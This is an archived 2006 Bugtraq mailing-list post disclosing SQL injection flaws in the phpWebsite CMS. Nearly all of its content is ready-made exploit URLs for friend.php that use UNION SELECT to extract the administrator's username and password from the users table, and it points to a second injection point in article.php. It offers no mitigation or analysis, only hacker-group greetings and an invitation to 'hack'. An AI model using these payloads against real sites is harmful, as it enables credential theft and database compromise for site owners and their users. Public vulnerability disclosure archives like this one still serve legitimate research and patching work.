lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060318210306.1356.qmail@securityfocus.com>
Date: 18 Mar 2006 21:03:06 -0000
From: dabdoub_mosikar@...islam.com
To: bugtraq@...urityfocus.com
Subject: phpWebsite <= SQL Injection (friend.php) & (article.php)


[+]phpWebsite
[+]DaBDouB-MoSiKaR [Moroccan Security Team]
[+]creetz to: Moroccan security Team[Dr.E-vil,Dr.Erase,H0550N],ToM-le-Magician[france] , ameer[egypt], Esp!onLeRaVaGe, CiM TeaM, xMs3D0,|ucifer,B6,al-houda members[nabil,sn!per,Kasparov]and all hackers musilm [morocco] and www.lezr.com
[+]special 10x to: safaa
[-]get name
[-]http://[target]/friend.php?op=FriendSend&sid=-1%20Union%20select%20name%20From%20users%20where%20uid=1
[+]
[-]get password:
[-]http://[target]/friend.php?op=FriendSend&sid=-1%20Union%20select%20pass%20From%20users%20where%20uid=1
[+] second sql
[-]http://[target]/article.php?sid=[sql]
[+]have nice day and hack


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ